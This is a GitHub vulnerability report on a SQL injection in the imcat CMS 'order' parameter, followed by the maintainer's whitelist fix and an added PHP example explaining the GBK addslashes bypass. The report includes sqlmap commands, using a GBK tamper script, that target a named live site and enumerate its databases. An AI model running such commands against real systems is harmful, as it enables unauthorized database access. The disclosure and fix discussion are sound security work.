
The vulnerability report: SQL injection vulnerability in the index.php page. #2

Closed
KernelC opened this issue Aug 6, 2019 · 1 comment

Comments


KernelC commented Aug 6, 2019

Exploit vulnerability:
Test parameter: order
[screenshot]

Use sqlmap (http://sqlmap.org/) with the sqlmap tamper script: unmagicquotes
payload:
sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes'

[screenshot]

sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes' --dbs
Get databases:

[screenshot]

Build/install imcat and test the vuln:

[three screenshots]

The vulnerable source code:
[screenshot]

Because the PHP code sets the database charset to GBK, this bypasses addslashes or GPC (magic quotes).

Security fix:

  1. Set the MySQL database charset to UTF-8.
  2. Check HTTP input (GET/POST) data and filter dangerous characters.
@peacexie peacexie pinned this issue Aug 12, 2019
peacexie (Owner) commented Aug 12, 2019

  • Thanks!
  • I'll fix it temporarily like this
  • File: /imcat/core/dops/dopExtra.php, code as below:
    function __construct($tab='',$cfg=array()){ 
        //...
        $this->soset($cfg);
        $dord = basReq::val('order','atime'); // cfg.soorders
        if(isset($cfg['soorders']) && !isset($cfg['soorders'][$dord])){
            die("Error `{$dord}`");
        }
        $this->order = $this->so->order = empty($cfg['order']) ? $dord : $cfg['order'];
    }

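The two points raised above, KernelC's observation that a GBK connection charset lets a quote survive addslashes(), and peacexie's whitelist check on the `order` parameter, can be shown together in one standalone script. This is an added example written for this page, not code from the imcat project: the function names (`pickOrder`, `quoteSurvivesGbk`) and the `$allowed` map are assumptions for illustration, and it needs PHP's mbstring extension. It generalises the posted fix in one respect: when no whitelist entry matches, the request value falls back to the default instead of being passed through, so the untrusted string never reaches the SQL text.

```php
<?php
// Added example (not imcat code): resolve an ORDER BY selector through a
// whitelist instead of escaping it. $allowed maps request keys to the real
// SQL fragments; only the mapped fragment is ever placed in the query.
function pickOrder(array $allowed, ?string $requested, string $default): string
{
    if (!isset($allowed[$default])) {
        throw new InvalidArgumentException("default order '{$default}' is not whitelisted");
    }
    // Unknown or missing request values fall back to the default rather than
    // being interpolated; array_key_exists avoids loose-comparison surprises.
    if ($requested === null || !array_key_exists($requested, $allowed)) {
        return $allowed[$default];
    }
    return $allowed[$requested];
}

// Why escaping alone is not a fix: for the bytes 0xBF 0x27, addslashes()
// yields 0xBF 0x5C 0x27, and a GBK decoder consumes 0xBF 0x5C as a single
// two-byte character, so the trailing 0x27 is a bare quote again.
function quoteSurvivesGbk(string $input): bool
{
    $escaped = addslashes($input);
    $asUtf8  = mb_convert_encoding($escaped, 'UTF-8', 'GBK');
    // true when the last character, read as GBK, is still an unescaped quote
    return mb_substr($asUtf8, -1, 1, 'UTF-8') === "'";
}

// Constructed whitelist (assumed column names) and constructed request values.
$allowed = [
    'atime' => 'atime DESC',
    'title' => 'title ASC',
    'hits'  => 'hits DESC',
];

foreach (['atime', 'hits', 'ctime', "\xbf\x27", null] as $req) {
    printf("%-12s -> %s\n", var_export($req, true), pickOrder($allowed, $req, 'atime'));
}

printf("quote survives addslashes under GBK: %s\n",
    quoteSurvivesGbk("\xbf\x27") ? 'yes' : 'no');
```

Running it prints `atime DESC` for the two whitelisted keys and falls back to `atime DESC` for `ctime`, the GBK byte pair and the missing value, while the last line reports `yes`: the escaping was undone by the charset, which is why the fix has to be a whitelist (and, as KernelC notes, a UTF-8 connection charset set on the connection itself), not more escaping.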
@peacexie peacexie reopened this Aug 12, 2019
peacexie added a commit that referenced this issue Aug 12, 2019
@peacexie peacexie unpinned this issue Aug 12, 2019
@peacexie peacexie pinned this issue Aug 12, 2019
@peacexie peacexie unpinned this issue Aug 12, 2019
@peacexie peacexie pinned this issue Aug 12, 2019
@peacexie peacexie unpinned this issue Aug 12, 2019